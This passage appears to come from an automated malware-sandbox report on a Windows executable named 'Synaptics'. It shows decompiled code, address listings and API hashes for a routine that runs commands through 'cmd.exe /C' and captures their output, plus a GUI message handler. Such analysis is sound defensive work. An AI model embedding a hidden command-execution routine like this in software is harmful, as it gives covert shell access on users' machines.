					_pop(_t125);
					 *[fs:eax] = _t125;
					_push(E00475588);
					return CloseHandle(_v16);
				} else {
					_push(_t133);
					_push(0x475563);
					_push( *[fs:eax]);
					 *[fs:eax] = _t135;
					do {
						ReadFile(_v16,  &_v380, 0xff,  &_v24, 0);
						asm("sbb ebx, ebx");
						_t112 = _t112 + 1;
						if(_v24 > 0) {
							 *((char*)(_t133 + _v24 - 0x178)) = 0;
							OemToCharA( &_v380,  &_v380);
							E00404C30( &_v388, 0x100,  &_v380);
							E00404C88(_t131, _v388);
						}
					} while (_t112 != 0 && _v24 != 0);
					WaitForSingleObject(_v124.hProcess, 0xffffffff);
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(E0047556A);
					CloseHandle(_v124.hThread);
					return CloseHandle(_v124);
				}
			}























                                                                                                                                                                                          0x00475385
                                                                                                                                                                                          0x00475387
                                                                                                                                                                                          0x00475391
                                                                                                                                                                                          0x00475397
                                                                                                                                                                                          0x0047539d
                                                                                                                                                                                          0x004753a0
                                                                                                                                                                                          0x004753a2
                                                                                                                                                                                          0x004753a5
                                                                                                                                                                                          0x004753ab
                                                                                                                                                                                          0x004753b3
                                                                                                                                                                                          0x004753ba
                                                                                                                                                                                          0x004753bb
                                                                                                                                                                                          0x004753c0
                                                                                                                                                                                          0x004753c3
                                                                                                                                                                                          0x004753c8
                                                                                                                                                                                          0x004753cd
                                                                                                                                                                                          0x004753d4
                                                                                                                                                                                          0x004753dd
                                                                                                                                                                                          0x004753ee
                                                                                                                                                                                          0x004753f5
                                                                                                                                                                                          0x004753f6
                                                                                                                                                                                          0x004753fb
                                                                                                                                                                                          0x004753fe
                                                                                                                                                                                          0x0047540b
                                                                                                                                                                                          0x00475410
                                                                                                                                                                                          0x00475417
                                                                                                                                                                                          0x0047541e
                                                                                                                                                                                          0x0047542b
                                                                                                                                                                                          0x00475431
                                                                                                                                                                                          0x00475437
                                                                                                                                                                                          0x00475444
                                                                                                                                                                                          0x0047545b
                                                                                                                                                                                          0x00475446
                                                                                                                                                                                          0x0047544c
                                                                                                                                                                                          0x0047544c
                                                                                                                                                                                          0x0047546b
                                                                                                                                                                                          0x00475489
                                                                                                                                                                                          0x0047549c
                                                                                                                                                                                          0x004754a4
                                                                                                                                                                                          0x004754a6
                                                                                                                                                                                          0x004754ab
                                                                                                                                                                                          0x004754b2
                                                                                                                                                                                          0x0047556c
                                                                                                                                                                                          0x0047556f
                                                                                                                                                                                          0x00475572
                                                                                                                                                                                          0x00475580
                                                                                                                                                                                          0x004754b8
                                                                                                                                                                                          0x004754ba
                                                                                                                                                                                          0x004754bb
                                                                                                                                                                                          0x004754c0
                                                                                                                                                                                          0x004754c3
                                                                                                                                                                                          0x004754c6
                                                                                                                                                                                          0x004754dc
                                                                                                                                                                                          0x004754e4
                                                                                                                                                                                          0x004754e6
                                                                                                                                                                                          0x004754eb
                                                                                                                                                                                          0x004754f0
                                                                                                                                                                                          0x00475506
                                                                                                                                                                                          0x0047551c
                                                                                                                                                                                          0x00475529
                                                                                                                                                                                          0x00475529
                                                                                                                                                                                          0x0047552e
                                                                                                                                                                                          0x0047553e
                                                                                                                                                                                          0x00475545
                                                                                                                                                                                          0x00475548
                                                                                                                                                                                          0x0047554b
                                                                                                                                                                                          0x00475554
                                                                                                                                                                                          0x00475562
                                                                                                                                                                                          0x00475562

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,004755BB,?,00000000,022B2A8C,?,00495E40,?,022B2A8C,022B2A8C,00000000,00000000), ref: 004753EE
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00475581,?,?,?), ref: 00475426
                                                                                                                                                                                            • Part of subcall function 00409A58: GetFileAttributesA.KERNEL32(00000000,00000000,00496E89,00000000,00496FE6), ref: 00409A63
                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,00475581,000000F6,00000000,00475581,?,?,?), ref: 0047549C
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,00475581,000000F6,00000000,00475581,?,?), ref: 004754AB
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004754DC
                                                                                                                                                                                          • OemToCharA.USER32(00000000,00000000), ref: 00475506
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00475581,000000FF,?,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF), ref: 0047553E
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,0047556A,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF,00000000), ref: 00475554
                                                                                                                                                                                          • CloseHandle.KERNEL32(00475581,?,0047556A,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF), ref: 0047555D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Handle$Close$CreateFile$AttributesCharObjectPipeProcessReadSingleWait
                                                                                                                                                                                          • String ID: C:\$D$cmd.exe /C
                                                                                                                                                                                          • API String ID: 3269375759-2807548070
                                                                                                                                                                                          • Opcode ID: 7bdbd5a9c081ae19022e5f39adc361a0922e6307b440424328d2d4c5eda7d141
                                                                                                                                                                                          • Instruction ID: 82437ea0ccec46d2af5a08e72f5cf6232f0238eba76bb00f3cc1c06be9a4dd54
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bdbd5a9c081ae19022e5f39adc361a0922e6307b440424328d2d4c5eda7d141
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E5150B1904608AFDB10EFA5C881BDEB7B8EB48314F51457AF518F72C1DB785E448B68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0044EA40 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 405nativeCOMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                          			E0044EA40(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HMENU__* _v12;
				signed int _v16;
				char _v17;
				intOrPtr _v24;
				int _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr _t137;
				signed int _t138;
				intOrPtr _t144;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t153;
				void* _t158;
				struct HMENU__* _t160;
				intOrPtr* _t165;
				void* _t173;
				signed int _t177;
				signed int _t181;
				void* _t182;
				void* _t214;
				struct HDC__* _t221;
				void* _t251;
				signed int _t257;
				void* _t265;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t278;
				signed int _t280;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t290;
				signed int _t291;
				intOrPtr _t307;
				intOrPtr _t311;
				intOrPtr _t333;
				intOrPtr _t342;
				intOrPtr _t346;
				intOrPtr* _t353;
				signed int _t355;
				intOrPtr* _t356;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				intOrPtr* _t375;
				void* _t377;
				void* _t378;
				intOrPtr _t379;
				void* _t380;

				_t377 = _t378;
				_t379 = _t378 + 0xffffffd0;
				_v52 = 0;
				_t375 = __edx;
				_v8 = __eax;
				_push(_t377);
				_push(0x44ef73);
				_push( *[fs:eax]);
				 *[fs:eax] = _t379;
				_t137 =  *__edx;
				_t380 = _t137 - 0x111;
				if(_t380 > 0) {
					_t138 = _t137 - 0x117;
					__eflags = _t138;
					if(_t138 == 0) {
						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t271;
						if(_t271 < 0) {
							goto L67;
						} else {
							_t272 = _t271 + 1;
							_t367 = 0;
							__eflags = 0;
							while(1) {
								_t150 = E0044DDEC(E0041AC6C(_v8, _t367),  *(_t375 + 4), __eflags);
								__eflags = _t150;
								if(_t150 != 0) {
									goto L68;
								}
								_t367 = _t367 + 1;
								_t272 = _t272 - 1;
								__eflags = _t272;
								if(_t272 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
					} else {
						_t151 = _t138 - 8;
						__eflags = _t151;
						if(_t151 == 0) {
							_v17 = 0;
							__eflags =  *(__edx + 6) & 0x00000010;
							if(( *(__edx + 6) & 0x00000010) != 0) {
								_v17 = 1;
							}
							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t274;
							if(__eflags < 0) {
								L32:
								_t153 =  *0x49dbcc; // 0x49ebb8
								E0045B010( *_t153, 0, __eflags);
								goto L67;
							} else {
								_t275 = _t274 + 1;
								_t368 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _v17 - 1;
									if(_v17 != 1) {
										_v12 =  *(_t375 + 4) & 0x0000ffff;
									} else {
										_t160 =  *(_t375 + 8);
										__eflags = _t160;
										if(_t160 == 0) {
											_v12 = 0xffffffff;
										} else {
											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
										}
									}
									_t158 = E0041AC6C(_v8, _t368);
									_t295 = _v17;
									_v16 = E0044DD30(_t158, _v17, _v12);
									__eflags = _v16;
									if(__eflags != 0) {
										break;
									}
									_t368 = _t368 + 1;
									_t275 = _t275 - 1;
									__eflags = _t275;
									if(__eflags != 0) {
										continue;
									} else {
										goto L32;
									}
									goto L68;
								}
								E004380E0( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
								_t165 =  *0x49dbcc; // 0x49ebb8
								E0045B010( *_t165, _v52, __eflags);
							}
						} else {
							__eflags = _t151 == 1;
							if(_t151 == 1) {
								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t277;
								if(_t277 < 0) {
									goto L67;
								} else {
									_t278 = _t277 + 1;
									_t369 = 0;
									__eflags = 0;
									while(1) {
										_v48 = E0041AC6C(_v8, _t369);
										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
										__eflags = _t173 -  *(_t375 + 8);
										if(_t173 ==  *(_t375 + 8)) {
											break;
										}
										_t177 = E0044DD30(_v48, 1,  *(_t375 + 8));
										__eflags = _t177;
										if(_t177 == 0) {
											_t369 = _t369 + 1;
											_t278 = _t278 - 1;
											__eflags = _t278;
											if(_t278 != 0) {
												continue;
											} else {
												goto L67;
											}
										} else {
											break;
										}
										goto L68;
									}
									E0044E630(_v48, _t375);
								}
							} else {
								goto L67;
							}
						}
					}
					goto L68;
				} else {
					if(_t380 == 0) {
						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t280;
						if(_t280 < 0) {
							goto L67;
						} else {
							_t281 = _t280 + 1;
							_t370 = 0;
							__eflags = 0;
							while(1) {
								E0041AC6C(_v8, _t370);
								_t181 = E0044DDD0( *(_t375 + 4), __eflags);
								__eflags = _t181;
								if(_t181 != 0) {
									goto L68;
								}
								_t370 = _t370 + 1;
								_t281 = _t281 - 1;
								__eflags = _t281;
								if(_t281 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
						goto L68;
					} else {
						_t182 = _t137 - 0x2b;
						if(_t182 == 0) {
							_v40 =  *((intOrPtr*)(__edx + 8));
							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t283;
							if(_t283 < 0) {
								goto L67;
							} else {
								_t284 = _t283 + 1;
								_t371 = 0;
								__eflags = 0;
								while(1) {
									_v16 = E0044DD30(E0041AC6C(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
									__eflags = _v16;
									if(_v16 != 0) {
										break;
									}
									_t371 = _t371 + 1;
									_t284 = _t284 - 1;
									__eflags = _t284;
									if(_t284 != 0) {
										continue;
									} else {
										goto L67;
									}
									goto L69;
								}
								_v24 = E0042572C(0, 1);
								_push(_t377);
								_push(0x44eda6);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								_v28 = SaveDC( *(_v40 + 0x18));
								_push(_t377);
								_push(0x44ed89);
								_push( *[fs:eax]);
								 *[fs:eax] = _t379;
								E00425CE8(_v24,  *(_v40 + 0x18));
								E00425B88(_v24);
								E0044F218(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
								_pop(_t333);
								 *[fs:eax] = _t333;
								_push(0x44ed90);
								__eflags = 0;
								E00425CE8(_v24, 0);
								return RestoreDC( *(_v40 + 0x18), _v28);
							}
						} else {
							_t214 = _t182 - 1;
							if(_t214 == 0) {
								_v44 =  *((intOrPtr*)(__edx + 8));
								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t286;
								if(_t286 < 0) {
									goto L67;
								} else {
									_t287 = _t286 + 1;
									_t372 = 0;
									__eflags = 0;
									while(1) {
										_v16 = E0044DD30(E0041AC6C(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
										__eflags = _v16;
										if(_v16 != 0) {
											break;
										}
										_t372 = _t372 + 1;
										_t287 = _t287 - 1;
										__eflags = _t287;
										if(_t287 != 0) {
											continue;
										} else {
											goto L67;
										}
										goto L69;
									}
									_t221 =  *((intOrPtr*)(_v8 + 0x10));
									L00407730();
									_v32 = _t221;
									 *[fs:eax] = _t379;
									_v24 = E0042572C(0, 1);
									 *[fs:eax] = _t379;
									_v28 = SaveDC(_v32);
									 *[fs:eax] = _t379;
									E00425CE8(_v24, _v32);
									E00425B88(_v24);
									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x44eea7, _t377,  *[fs:eax], 0x44eec4, _t377,  *[fs:eax], 0x44eee9, _t377, _t221);
									_pop(_t342);
									 *[fs:eax] = _t342;
									_push(0x44eeae);
									__eflags = 0;
									E00425CE8(_v24, 0);
									return RestoreDC(_v32, _v28);
								}
							} else {
								if(_t214 == 0x27) {
									_v36 =  *((intOrPtr*)(__edx + 8));
									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
									__eflags = _t290;
									if(_t290 < 0) {
										goto L67;
									} else {
										_t291 = _t290 + 1;
										_t373 = 0;
										__eflags = 0;
										while(1) {
											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E0041AC6C(_v8, _t373))) + 0x34))();
											_t346 = _v36;
											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
												_v16 = E0044DD30(E0041AC6C(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
											} else {
												_v16 =  *((intOrPtr*)(E0041AC6C(_v8, _t373) + 0x34));
											}
											__eflags = _v16;
											if(_v16 != 0) {
												break;
											}
											_t373 = _t373 + 1;
											_t291 = _t291 - 1;
											__eflags = _t291;
											if(_t291 != 0) {
												continue;
											} else {
												goto L67;
											}
											goto L68;
										}
										_t257 = E0044DD60(E0041AC6C(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
										__eflags = _t257;
										if(_t257 == 0) {
											_t265 = E0041AC6C(_v8, _t373);
											__eflags = 0;
											_t257 = E0044DD60(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
										}
										_t353 =  *0x49de0c; // 0x49ebbc
										_t56 =  *_t353 + 0x6c; // 0x0
										_t355 =  *_t56;
										__eflags = _t355;
										if(_t355 != 0) {
											__eflags = _t257;
											if(_t257 == 0) {
												_t257 =  *(_t355 + 0x158);
											}
											_t307 =  *0x49de0c; // 0x49ebbc
											__eflags =  *(_t355 + 0x228) & 0x00000008;
											if(( *(_t355 + 0x228) & 0x00000008) == 0) {
												_t356 =  *0x49dbcc; // 0x49ebb8
												E0045ACB4( *_t356, _t291, _t307, _t257, _t373, _t375);
											} else {
												E0045AD1C();
											}
										}
									}
								} else {
									L67:
									_push( *(_t375 + 8));
									_push( *(_t375 + 4));
									_push( *_t375);
									_t144 =  *((intOrPtr*)(_v8 + 0x10));
									_push(_t144);
									L00407540();
									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
								}
								L68:
								_pop(_t311);
								 *[fs:eax] = _t311;
								_push(0x44ef7a);
								return E004049C0( &_v52);
							}
						}
					}
				}
				L69:
			}



































































                                                                                                                                                                                          0x0044ea41
                                                                                                                                                                                          0x0044ea43
                                                                                                                                                                                          0x0044ea4b
                                                                                                                                                                                          0x0044ea4e
                                                                                                                                                                                          0x0044ea50
                                                                                                                                                                                          0x0044ea55
                                                                                                                                                                                          0x0044ea56
                                                                                                                                                                                          0x0044ea5b
                                                                                                                                                                                          0x0044ea5e
                                                                                                                                                                                          0x0044ea61
                                                                                                                                                                                          0x0044ea63
                                                                                                                                                                                          0x0044ea68
                                                                                                                                                                                          0x0044ea8a
                                                                                                                                                                                          0x0044ea8a
                                                                                                                                                                                          0x0044ea8f
                                                                                                                                                                                          0x0044eade
                                                                                                                                                                                          0x0044eadf
                                                                                                                                                                                          0x0044eae1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044eae7
                                                                                                                                                                                          0x0044eae7
                                                                                                                                                                                          0x0044eae8
                                                                                                                                                                                          0x0044eae8
                                                                                                                                                                                          0x0044eaea
                                                                                                                                                                                          0x0044eaf7
                                                                                                                                                                                          0x0044eafc
                                                                                                                                                                                          0x0044eafe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044eb04
                                                                                                                                                                                          0x0044eb05
                                                                                                                                                                                          0x0044eb05
                                                                                                                                                                                          0x0044eb06
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044eb08
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044eb08
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044eb06
                                                                                                                                                                                          0x0044eaea
                                                                                                                                                                                          0x0044ea91
                                                                                                                                                                                          0x0044ea91
                                                                                                                                                                                          0x0044ea91
                                                                                                                                                                                          0x0044ea94
                                                                                                                                                                                          0x0044eb0d
                                                                                                                                                                                          0x0044eb11
                                                                                                                                                                                          0x0044eb15
                                                                                                                                                                                          0x0044eb17
                                                                                                                                                                                          0x0044eb17
                                                                                                                                                                                          0x0044eb21
                                                                                                                                                                                          0x0044eb22
                                                                                                                                                                                          0x0044eb24
                                                                                                                                                                                          0x0044eb9a
                                                                                                                                                                                          0x0044eb9a
                                                                                                                                                                                          0x0044eba3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044eb26
                                                                                                                                                                                          0x0044eb26
                                                                                                                                                                                          0x0044eb27
                                                                                                                                                                                          0x0044eb27
                                                                                                                                                                                          0x0044eb29
                                                                                                                                                                                          0x0044eb29
                                                                                                                                                                                          0x0044eb2d
                                                                                                                                                                                          0x0044eb53
                                                                                                                                                                                          0x0044eb2f
                                                                                                                                                                                          0x0044eb2f
                                                                                                                                                                                          0x0044eb32
                                                                                                                                                                                          0x0044eb34
                                                                                                                                                                                          0x0044eb46
                                                                                                                                                                                          0x0044eb36
                                                                                                                                                                                          0x0044eb41
                                                                                                                                                                                          0x0044eb41
                                                                                                                                                                                          0x0044eb34
                                                                                                                                                                                          0x0044eb5b
                                                                                                                                                                                          0x0044eb60
                                                                                                                                                                                          0x0044eb6b
                                                                                                                                                                                          0x0044eb6e
                                                                                                                                                                                          0x0044eb72
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044eb96
                                                                                                                                                                                          0x0044eb97
                                                                                                                                                                                          0x0044eb97
                                                                                                                                                                                          0x0044eb98
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044eb98
                                                                                                                                                                                          0x0044eb7d
                                                                                                                                                                                          0x0044eb85
                                                                                                                                                                                          0x0044eb8c
                                                                                                                                                                                          0x0044eb8c
                                                                                                                                                                                          0x0044ea96
                                                                                                                                                                                          0x0044ea96
                                                                                                                                                                                          0x0044ea97
                                                                                                                                                                                          0x0044ef00
                                                                                                                                                                                          0x0044ef01
                                                                                                                                                                                          0x0044ef03
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044ef05
                                                                                                                                                                                          0x0044ef05
                                                                                                                                                                                          0x0044ef06
                                                                                                                                                                                          0x0044ef06
                                                                                                                                                                                          0x0044ef08
                                                                                                                                                                                          0x0044ef12
                                                                                                                                                                                          0x0044ef1a
                                                                                                                                                                                          0x0044ef1d
                                                                                                                                                                                          0x0044ef20
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044ef2a
                                                                                                                                                                                          0x0044ef2f
                                                                                                                                                                                          0x0044ef31
                                                                                                                                                                                          0x0044ef3f
                                                                                                                                                                                          0x0044ef40
                                                                                                                                                                                          0x0044ef40
                                                                                                                                                                                          0x0044ef41
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044ef31
                                                                                                                                                                                          0x0044ef38
                                                                                                                                                                                          0x0044ef38
                                                                                                                                                                                          0x0044ea9d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044ea9d
                                                                                                                                                                                          0x0044ea97
                                                                                                                                                                                          0x0044ea94
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044ea6a
                                                                                                                                                                                          0x0044ea6a
                                                                                                                                                                                          0x0044eaa8
                                                                                                                                                                                          0x0044eaa9
                                                                                                                                                                                          0x0044eaab
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044eab1
                                                                                                                                                                                          0x0044eab1
                                                                                                                                                                                          0x0044eab2
                                                                                                                                                                                          0x0044eab2
                                                                                                                                                                                          0x0044eab4
                                                                                                                                                                                          0x0044eab9
                                                                                                                                                                                          0x0044eac2
                                                                                                                                                                                          0x0044eac7
                                                                                                                                                                                          0x0044eac9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044eacf
                                                                                                                                                                                          0x0044ead0
                                                                                                                                                                                          0x0044ead0
                                                                                                                                                                                          0x0044ead1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044ead3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044ead3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044ead1
                                                                                                                                                                                          0x0044eab4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044ea6c
                                                                                                                                                                                          0x0044ea6c
                                                                                                                                                                                          0x0044ea6f
                                                                                                                                                                                          0x0044ecb2
                                                                                                                                                                                          0x0044ecbb
                                                                                                                                                                                          0x0044ecbc
                                                                                                                                                                                          0x0044ecbe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044ecc4
                                                                                                                                                                                          0x0044ecc4
                                                                                                                                                                                          0x0044ecc5
                                                                                                                                                                                          0x0044ecc5
                                                                                                                                                                                          0x0044ecc7
                                                                                                                                                                                          0x0044ecde
                                                                                                                                                                                          0x0044ece1
                                                                                                                                                                                          0x0044ece5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044edad
                                                                                                                                                                                          0x0044edae
                                                                                                                                                                                          0x0044edae
                                                                                                                                                                                          0x0044edaf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044edb5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044edb5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044edaf
                                                                                                                                                                                          0x0044ecf7
                                                                                                                                                                                          0x0044ecfc
                                                                                                                                                                                          0x0044ecfd
                                                                                                                                                                                          0x0044ed02
                                                                                                                                                                                          0x0044ed05
                                                                                                                                                                                          0x0044ed14
                                                                                                                                                                                          0x0044ed19
                                                                                                                                                                                          0x0044ed1a
                                                                                                                                                                                          0x0044ed1f
                                                                                                                                                                                          0x0044ed22
                                                                                                                                                                                          0x0044ed2e
                                                                                                                                                                                          0x0044ed43
                                                                                                                                                                                          0x0044ed5c
                                                                                                                                                                                          0x0044ed63
                                                                                                                                                                                          0x0044ed66
                                                                                                                                                                                          0x0044ed69
                                                                                                                                                                                          0x0044ed6e
                                                                                                                                                                                          0x0044ed73
                                                                                                                                                                                          0x0044ed88
                                                                                                                                                                                          0x0044ed88
                                                                                                                                                                                          0x0044ea75
                                                                                                                                                                                          0x0044ea75
                                                                                                                                                                                          0x0044ea76
                                                                                                                                                                                          0x0044edbd
                                                                                                                                                                                          0x0044edc6
                                                                                                                                                                                          0x0044edc7
                                                                                                                                                                                          0x0044edc9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044edcf
                                                                                                                                                                                          0x0044edcf
                                                                                                                                                                                          0x0044edd0
                                                                                                                                                                                          0x0044edd0
                                                                                                                                                                                          0x0044edd2
                                                                                                                                                                                          0x0044ede9
                                                                                                                                                                                          0x0044edec
                                                                                                                                                                                          0x0044edf0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044eef0
                                                                                                                                                                                          0x0044eef1
                                                                                                                                                                                          0x0044eef1
                                                                                                                                                                                          0x0044eef2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044eef8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044eef8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044eef2
                                                                                                                                                                                          0x0044edf9
                                                                                                                                                                                          0x0044edfd
                                                                                                                                                                                          0x0044ee02
                                                                                                                                                                                          0x0044ee10
                                                                                                                                                                                          0x0044ee1f
                                                                                                                                                                                          0x0044ee2d
                                                                                                                                                                                          0x0044ee39
                                                                                                                                                                                          0x0044ee47
                                                                                                                                                                                          0x0044ee50
                                                                                                                                                                                          0x0044ee65
                                                                                                                                                                                          0x0044ee7f
                                                                                                                                                                                          0x0044ee84
                                                                                                                                                                                          0x0044ee87
                                                                                                                                                                                          0x0044ee8a
                                                                                                                                                                                          0x0044ee8f
                                                                                                                                                                                          0x0044ee94
                                                                                                                                                                                          0x0044eea6
                                                                                                                                                                                          0x0044eea6
                                                                                                                                                                                          0x0044ea7c
                                                                                                                                                                                          0x0044ea7f
                                                                                                                                                                                          0x0044ebb0
                                                                                                                                                                                          0x0044ebb9
                                                                                                                                                                                          0x0044ebba
                                                                                                                                                                                          0x0044ebbc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044ebc2
                                                                                                                                                                                          0x0044ebc2
                                                                                                                                                                                          0x0044ebc3
                                                                                                                                                                                          0x0044ebc3
                                                                                                                                                                                          0x0044ebc5
                                                                                                                                                                                          0x0044ebd1
                                                                                                                                                                                          0x0044ebd4
                                                                                                                                                                                          0x0044ebd7
                                                                                                                                                                                          0x0044ebda
                                                                                                                                                                                          0x0044ec05
                                                                                                                                                                                          0x0044ebdc
                                                                                                                                                                                          0x0044ebe9
                                                                                                                                                                                          0x0044ebe9
                                                                                                                                                                                          0x0044ec08
                                                                                                                                                                                          0x0044ec0c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044eca2
                                                                                                                                                                                          0x0044eca3
                                                                                                                                                                                          0x0044eca3
                                                                                                                                                                                          0x0044eca4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044ecaa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044ecaa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044eca4
                                                                                                                                                                                          0x0044ec24
                                                                                                                                                                                          0x0044ec29
                                                                                                                                                                                          0x0044ec2b
                                                                                                                                                                                          0x0044ec32
                                                                                                                                                                                          0x0044ec3d
                                                                                                                                                                                          0x0044ec3f
                                                                                                                                                                                          0x0044ec3f
                                                                                                                                                                                          0x0044ec44
                                                                                                                                                                                          0x0044ec4c
                                                                                                                                                                                          0x0044ec4c
                                                                                                                                                                                          0x0044ec4f
                                                                                                                                                                                          0x0044ec51
                                                                                                                                                                                          0x0044ec57
                                                                                                                                                                                          0x0044ec59
                                                                                                                                                                                          0x0044ec60
                                                                                                                                                                                          0x0044ec60
                                                                                                                                                                                          0x0044ec66
                                                                                                                                                                                          0x0044ec6c
                                                                                                                                                                                          0x0044ec73
                                                                                                                                                                                          0x0044ec8f
                                                                                                                                                                                          0x0044ec98
                                                                                                                                                                                          0x0044ec75
                                                                                                                                                                                          0x0044ec85
                                                                                                                                                                                          0x0044ec85
